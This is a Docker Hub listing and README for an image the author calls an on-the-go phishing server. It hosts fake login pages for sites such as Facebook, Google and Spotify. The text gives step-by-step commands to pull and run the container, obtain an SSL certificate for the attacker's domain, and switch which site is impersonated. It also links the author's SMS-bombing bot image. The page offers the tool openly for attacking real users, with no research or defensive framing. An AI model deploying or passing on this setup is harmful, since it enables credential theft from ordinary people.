A Docker image for on the go Phishing Server
4.1K
Just a Docker Image for Portable Setup for phishing Targets for websites like Facebook, Google, Spotify, etc. This Image can be used on any device without any hassle of configuring or setup your system for the attack. It can even be deployed on any cloud provider.
Doceker Image Build for using any Cloud Server or Computer as a Phishing server.
Docker Repo: https://hub.docker.com/r/insomniaccoder/phishing
Refer My Blog for usage : https://harshsinghvi.github.io/blog/is-cloud-a-tool-for-hackers/
https://<your_domain>/<sitename>.htmlhttps://<your_domain>/<sitename>.txthttps://<your_domain>/raw.txthttps://<your_domain>/index.html or simply https://<your_domain>sudo docker pull insomniaccoder/phishing:latest # or put any other supported tags
sudo docker run -d -it --name phishing_demo -p 80:80 -p 443:443 insomniaccoder/phishing # I have made this image myself for you guys
Getting SSL Certificate
sudo docker exec -it phishing_demo bash # connect to the container
ls # to see the installed sites in the container
certbot --apache --register-unsafely-without-email -d <your domain name> # complete the precess and you got the SSL certificate
To Change Default website
docker exec phishing_demo ./change.sh <site-name> ## use default to restore else name of above mentioned supported sites
git clone https://github.com/harshsinghvi/phishing_cloud.git
cd phishing_cloud
docker -t <image_name> .
My Website : https://harshsinghvi.com
My GitHub Profile : https://github.com/harshsinghvi/sms-bomb-telegram-bot-docker
Docker Hub Profile: https://hub.docker.com/r/insomniaccoder/smsbomb
Content type
Image
Digest
Size
189.9 MB
Last updated
almost 6 years ago
docker pull insomniaccoder/phishing